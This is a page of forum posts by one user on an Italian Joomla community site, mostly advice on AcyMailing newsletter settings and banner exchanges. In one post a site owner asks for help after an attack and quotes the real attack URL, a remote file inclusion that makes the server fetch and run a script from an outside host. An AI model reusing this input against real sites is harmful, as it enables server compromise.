Back to top

Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - acecondor

Pagine: [1]
1
Personalmente faccio così: non modifico il modulo di registrazione ma la mail di conferma; in questa inserisco tutto il testo sul trattamento dati ed infine il link di conferma con la scritta con confermato l'iscrizione di accetta il trattamento dati eccetera eccetera.

2
Fai un backup del sito (file e database per sicurezza) e procedi con l'installazione della nuova versione senza disinstallare la vecchia; in questo modo rimarranno inalterate le impostazione, le liste, gli utenti, eccetera.

http://www.acyba.com/en/support/documentation/66-how-to-install-acymailing.html

3
io li farei iscrivere in una mailing che chiamerei attesa e quindi li sposterei poi alla lista docenti o genitori;)

Concordo pienamente, era il mio stesso consiglio di alcuni post fa ovvero creare una lista provvisoria, ma forse non si era compreso.
Buon lavoro.

4
Sicuramente manca una vera analisi dell'esigenza di Vicaruso.
Io personalmente non sono pienamente d'accordo di abilitare gli utenti e poi controllare le iscrizioni prima dell'invio, per varie ragioni, come ad esempio l'amministratore potrebbe non essere lo stesso utente che invia le news, bisogna ricordarsi fin dove si è controllato dall'ultimo controllo, eccetera.

Magari se Vicaruso ci spiega meglio le sue necessità alla base si può indirizzare meglio la soluzione.
Potresti ad esempio far si che il modulo di iscrizione sia riservato agli utenti registrati, quindi scremi gli utenti in fase di registrazione.

5
Ho controllato la Starter ed il problema è che non ti permette di personalizzare la mail di conferma, quindi sei "fregato"..

L'unico consiglio che mi rimane è creare due liste, una temporanea (gli utenti si iscrivono in automatico) e quella reale, che tieni nascosta in fase d'iscrizione e applichi manualmente dalla pannello utenti.
Non ho verificato la cosa, ma potrebbe funzionare.

Altra alternativa più "tecnica" mettere mano al codice e modificare l'iscrizione utente.

6
Ciao vicaruso,
puoi farlo, segui le indicazioni che ho scritto prima, ovvero abilita l'opzione "richiedi conferma" e modifica la mail di conferma, togliendo il link di conferma automatica e mettendo un testo del tipo "La tua iscrizione deve essere approvata da un amministratore".
Poi alla voce "Quando un nuovo utente è creato, invia un email a" metti il tuo indirizzo.

Quando l'utente si iscrive rimane in sospeso; lui ricevi il messaggio di attesa, tu quello di iscrizione; dovrai accedere manualmente alla lista degli iscritti e confermalo o cancellarlo manualmente.

Io faccio riferimento alla versione Enterprise che uso, ma dovresti poterlo fare anche con la Starter.


7
Con l'opzione "Richiede conferma" nella configurazione, sotto "Iscrizione" puoi richiedere la conferma tramite link inviato per email all'utente; è questo che intendevi o un attivazione manuale dell'amministratore?

Nel secondo caso potresti togliere il link di conferma dalla mail e confermarlo tu manualmente.

8
Non saprei cosa dirti Gatto,
io uso la versione Enterprise ed ho creato un dominio di terzo livello del tipo newsletter.example.com con un indirizzo dedicato no-reply@newsletter.example.com e l'invio con questo tramite SMTP impostato per rientrare nel limite di invio e attivato mediante cron.
Se non ricordo male anche con le versioni a pagamento (almeno quelle più vecchie, usate per le prime prove) non ricevevo alcun messaggio per il mancato invio diretto tramite PHP.

Se hai molti invii e non vuoi acquistare la versione a pagamento potresti attivare un server SMTP sul tuo PC solo il tempo necessario per l'invio; con questa soluzione non avresti limiti d'invio con l'unico problema che alcuni ISP (vedi Telecom Italia) inseriscono gli IP WAN nelle blacklist.

Per l'orario forse il fuso del server è diverso dal nostro.

Il problema è che AcyMailing Starter gestisce il limite di invio ma non un cron per lo stesso; quindi se tu programmi di inviare 10 email in 10 minuti lui fa il primo invio di 10, se provi a fare un nuovo invio nei 10 minuti non fa nulla, se lo attivi dopo i 10 minuti ne invia altre 10, ma se non attivi l'invio dopo 10 minuti non spedisce più niente, rimane tutto in coda.

9
In genere gli hosting condivisi hanno un limite di invii orari per quanto riguarda le mail. Come si comporta Acymailing se la lista utenti supera questo limite?

Devi impostare i limiti di invio in base al tuo hosting; raggiunto il limite di norma i successivi invii non vanno in coda ma semplicemente generano un errore e non vengono inviati dal server.
La cosa migliore è acquistare almeno la versione "Essential" che permette di elaborare la coda tramite cron.
Con la versione free l'invio può essere molto noioso: http://www.acyba.com/en/support/documentation/116-acymailing-send-process.html

10
Ciao a tutti,
una pagina realizzata con FacileForms è stata attaccata utilizzata e per eseguire uno script maligno sul server (Linux)

in dettaglio l'url è questo:
index.php?option=com_sef-&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do

Joomla è aggiornato alla 1.0.10, FacileForms alla 1.4.7 e RG_EMULATION a 0 inoltre utilizzo JoomSEF 2.1.0 (ora aggiornato alla 2.2.6)

Che fare? Per il momento ho disattivato FacileForms, qualche consiglio?
Secondo voi il problema è di FacileForms o JoomSEF?

Grazie.

11
Io utilizzo ARTIO JoomSEF che ti permette di semplificare e di rendere più descrittivi i link.

Ciao  :)

12
Rispondo anche se è passato molto tempo visto che potrebbe essere utile ad altri.

La cartella predefinita è images/stories/newsletter

Ciao  :)

13
Piccola segnalazione per AlexRed:

nella pagina dei siti Partner il primo banner Kustom Garage (che è presente anche a fine pagina) punta su di-natale  ???

Ciao  :)

14
Ecco qua il mio "bollino"



La descrizione è: Vulcano Team Software
URL: http://www.vulcanoteam.eu

Natulamtente logo Joomla.it è già in home page  ;)

THX  :)

15
Citazione
ciao acecondor, puoi far rientrare in queste misure il banner ?
150 x 100 pixel

Ok ,corretto; scusa, avevo letto male...  ;D

16
Ciao a tutti

Ho inserito il "bollino" Joomla.it nella mia Home Page http://www.defcon.it

Questo è il mio:


Grazie e alla prossima  ;D

Pagine: [1]


Web Design Bolzano Kreatif